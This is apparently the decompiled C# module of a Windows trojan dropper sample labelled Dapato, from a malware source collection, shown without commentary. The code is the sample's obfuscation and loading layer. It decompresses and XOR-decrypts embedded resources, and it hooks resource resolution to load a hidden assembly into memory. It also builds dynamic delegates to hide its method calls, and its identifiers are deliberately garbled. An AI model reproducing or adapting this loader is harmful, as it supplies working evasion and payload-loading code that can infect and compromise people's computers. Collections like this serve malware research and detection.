MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e/_003CModule_003E.cs

// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe

using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Reflection.Emit;
using System.Text;

internal class \u003CModule\u003E
{
  static \u003CModule\u003E()
  {
    倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ.鈧렠\u1AF4鱛렪뜾㶘䄋();
    AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u003CModule\u003E.\u0004Щ\u000A\u0022\uFFFD\u0014C\uFFFD\uFFFD\uFFFD\u003EB\uFFFD\uFFFD\uFFFD);
    \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ᕔ祩晾怏\uFFFD\uFFFD\uF888㩟();
  }

  internal static object \uFFFD\uFFFD\u001E\u0026\uFFFD\uFFFD\uFFFD\uFFFD\uFFFD\uFFFD\uFFFDoP\u000C\uFFFD\u0023(
    uint id)
  {
    if (!(AppDomain.CurrentDomain.GetData("<22>\to<74><6F>A<EFBFBD><41><EFBFBD><EFBFBD>\u0016<31><36>K<EFBFBD>G") is Dictionary<uint, object> dictionary))
    {
      AppDomain.CurrentDomain.SetData("<22>\to<74><6F>A<EFBFBD><41><EFBFBD><EFBFBD>\u0016<31><36>K<EFBFBD>G", (object) (dictionary = new Dictionary<uint, object>()));
      MemoryStream memoryStream = new MemoryStream();
      using (DeflateStream deflateStream = new DeflateStream(Assembly.GetCallingAssembly().GetManifestResourceStream("<22>\to<74><6F>A<EFBFBD><41><EFBFBD><EFBFBD>\u0016<31><36>K<EFBFBD>G"), CompressionMode.Decompress))
      {
        byte[] buffer = new byte[4096];
        int count = deflateStream.Read(buffer, 0, 4096);
        do
        {
          memoryStream.Write(buffer, 0, count);
          count = deflateStream.Read(buffer, 0, 4096);
        }
        while (count != 0);
      }
      AppDomain.CurrentDomain.SetData("<22>\u0017X<37>\\!MTR<54><52>n@<e<>", (object) memoryStream.ToArray());
    }
    uint num1 = 63406061U ^ (uint) new StackFrame(1).GetMethod().MetadataToken;
    uint num2 = 1424006901;
    uint num3 = 965706829;
    for (uint index = 1; index <= 64U; ++index)
    {
      num1 = (uint) (((int) num1 & 16777215) << 8) | (num1 & 4278190080U) >> 24;
      uint num4 = (num1 & (uint) byte.MaxValue) % 64U;
      if (num4 >= 0U && num4 < 16U)
      {
        num2 |= (uint) ((int) ((num1 & 65280U) >> 8) & (int) ((num1 & 16711680U) >> 16) ^ ~(int) num1 & (int) byte.MaxValue);
        num3 ^= (uint) ((int) num1 * (int) index + 1) % 16U;
        num1 += (uint) (((int) num2 | (int) num3) ^ 115327713);
      }
      else if (num4 >= 16U && num4 < 32U)
      {
        num2 ^= (uint) (((int) num1 & 16711935) << 8 ^ ((int) ((num1 & 16776960U) >> 8) | ~(int) num1 & (int) ushort.MaxValue));
        num3 += num1 * index % 32U;
        num1 |= (uint) ((int) num2 + ~(int) num3 & 115327713);
      }
      else if (num4 >= 32U && num4 < 48U)
      {
        num2 += (uint) (((int) num1 & (int) byte.MaxValue | (int) ((num1 & 16711680U) >> 16)) + (~(int) num1 & (int) byte.MaxValue));
        num3 -= (uint) ~((int) num1 + (int) num4) % 48U;
        num1 ^= num2 % num3 | 115327713U;
      }
      else if (num4 >= 48U && num4 < 64U)
      {
        num2 ^= (uint) (((int) ((num1 & 16711680U) >> 16) | ~((int) num1 & (int) byte.MaxValue)) * (~(int) num1 & 16711680));
        num3 += (num1 ^ index - 1U) % num4;
        num1 -= (uint) (~((int) num2 ^ (int) num3) + 115327713);
      }
    }
    uint num5 = num1 ^ id;
    object obj;
    if (!dictionary.TryGetValue(num5, out obj))
    {
      using (BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream((byte[]) AppDomain.CurrentDomain.GetData("<22>\u0017X<37>\\!MTR<54><52>n@<e<>"))))
      {
        binaryReader.BaseStream.Seek((long) num5, SeekOrigin.Begin);
        byte num6 = binaryReader.ReadByte();
        byte[] bytes = binaryReader.ReadBytes(binaryReader.ReadInt32());
        Random random = new Random(115327713 ^ (int) num5);
        byte[] numArray = new byte[bytes.Length];
        random.NextBytes(numArray);
        BitArray bitArray = new BitArray(bytes);
        bitArray.Xor(new BitArray(numArray));
        bitArray.CopyTo((Array) bytes, 0);
        switch (num6)
        {
          case 27:
            obj = (object) BitConverter.ToInt32(bytes, 0);
            break;
          case 37:
            obj = (object) BitConverter.ToSingle(bytes, 0);
            break;
          case 98:
            obj = (object) Encoding.UTF8.GetString(bytes);
            break;
          case 105:
            obj = (object) BitConverter.ToDouble(bytes, 0);
            break;
          case 201:
            obj = (object) BitConverter.ToInt64(bytes, 0);
            break;
        }
        dictionary[num5] = obj;
      }
    }
    return obj;
  }

  internal static void \uE0F2팞雊昌அ囯ꔚ\u2BAE(RuntimeFieldHandle f)
  {
    FieldInfo fieldFromHandle = FieldInfo.GetFieldFromHandle(f);
    Assembly executingAssembly = Assembly.GetExecutingAssembly();
    char[] chArray = new char[fieldFromHandle.Name.Length];
    for (int index = 0; index < chArray.Length; index++)
      chArray[index] = (char) ((int) (byte) fieldFromHandle.Name[index] ^ index);
    ConstructorInfo con = executingAssembly.GetModules()[0].ResolveMethod(BitConverter.ToInt32(Convert.FromBase64String(new string(chArray)), 0) ^ 2024849617) as ConstructorInfo;
    ParameterInfo[] parameters = con.GetParameters();
    Type[] parameterTypes = new Type[parameters.Length];
    for (int index = 0; index < parameters.Length; ++index)
      parameterTypes[index] = parameters[index].ParameterType;
    DynamicMethod dynamicMethod = new DynamicMethod("", con.DeclaringType, parameterTypes, con.DeclaringType, true);
    ILGenerator ilGenerator = dynamicMethod.GetILGenerator();
    for (int index = 0; index < parameterTypes.Length; index++)
      ilGenerator.Emit(OpCodes.Ldarg_S, index);
    ilGenerator.Emit(OpCodes.Newobj, con);
    ilGenerator.Emit(OpCodes.Ret);
    fieldFromHandle.SetValue((object) null, (object) dynamicMethod.CreateDelegate(fieldFromHandle.FieldType));
  }

  internal static void \u21AC\uF68D鸬泐䰺圈\u2A73蘍(RuntimeFieldHandle f)
  {
    FieldInfo fieldFromHandle = FieldInfo.GetFieldFromHandle(f);
    Assembly executingAssembly = Assembly.GetExecutingAssembly();
    char[] chArray = new char[fieldFromHandle.Name.Length];
    for (int index = 0; index < chArray.Length; ++index)
      chArray[index] = (char) ((int) (byte) fieldFromHandle.Name[index] ^ index);
    byte[] numArray = Convert.FromBase64String(new string(chArray));
    MethodInfo methodInfo = executingAssembly.GetModules()[0].ResolveMethod(BitConverter.ToInt32(numArray, 1) ^ 1291843285) as MethodInfo;
    if (methodInfo.IsStatic)
    {
      fieldFromHandle.SetValue((object) null, (object) Delegate.CreateDelegate(fieldFromHandle.FieldType, methodInfo));
    }
    else
    {
      ParameterInfo[] parameters = methodInfo.GetParameters();
      Type[] parameterTypes = new Type[parameters.Length + 1];
      parameterTypes[0] = typeof (object);
      for (int index = 0; index < parameters.Length; index++)
        parameterTypes[index + 1] = parameters[index].ParameterType;
      DynamicMethod dynamicMethod = !methodInfo.DeclaringType.IsInterface ? new DynamicMethod("", methodInfo.ReturnType, parameterTypes, methodInfo.DeclaringType, true) : new DynamicMethod("", methodInfo.ReturnType, parameterTypes, (Type) null, true);
      ILGenerator ilGenerator = dynamicMethod.GetILGenerator();
      for (int index = 0; index < parameterTypes.Length; index++)
      {
        ilGenerator.Emit(OpCodes.Ldarg, index);
        if (index == 0)
          ilGenerator.Emit(OpCodes.Castclass, methodInfo.DeclaringType);
      }
      ilGenerator.Emit(numArray[0] == (byte) 13 ? OpCodes.Callvirt : OpCodes.Call, methodInfo);
      ilGenerator.Emit(OpCodes.Ret);
      fieldFromHandle.SetValue((object) null, (object) dynamicMethod.CreateDelegate(fieldFromHandle.FieldType));
    }
  }

  internal static Assembly \u0004Щ\u000A\u0022\uFFFD\u0014C\uFFFD\uFFFD\uFFFD\u003EB\uFFFD\uFFFD\uFFFD(
    object sender,
    ResolveEventArgs args)
  {
    if (!(AppDomain.CurrentDomain.GetData("<22>v<EFBFBD>%(<28><>K<EFBFBD><4B>0Ə<30>H<EFBFBD>") is Assembly data))
    {
      using (BinaryReader binaryReader1 = new BinaryReader((Stream) new DeflateStream(typeof (\u003CModule\u003E).Assembly.GetManifestResourceStream("<22>v<EFBFBD>%(<28><>K<EFBFBD><4B>0Ə<30>H<EFBFBD>"), CompressionMode.Decompress)))
      {
        byte[] numArray = binaryReader1.ReadBytes(binaryReader1.ReadInt32());
        byte[] buffer = new byte[numArray.Length / 2];
        for (int index = 0; index < numArray.Length; index += 2)
          buffer[index / 2] = (byte) (((int) numArray[index + 1] ^ 78) * 78 + ((int) numArray[index] ^ 78));
        using (BinaryReader binaryReader2 = new BinaryReader((Stream) new DeflateStream((Stream) new MemoryStream(buffer), CompressionMode.Decompress)))
        {
          data = Assembly.Load(binaryReader2.ReadBytes(binaryReader2.ReadInt32()));
          AppDomain.CurrentDomain.SetData("<22>v<EFBFBD>%(<28><>K<EFBFBD><4B>0Ə<30>H<EFBFBD>", (object) data);
        }
      }
    }
    return Array.IndexOf<string>(data.GetManifestResourceNames(), args.Name) == -1 ? (Assembly) null : data;
  }
}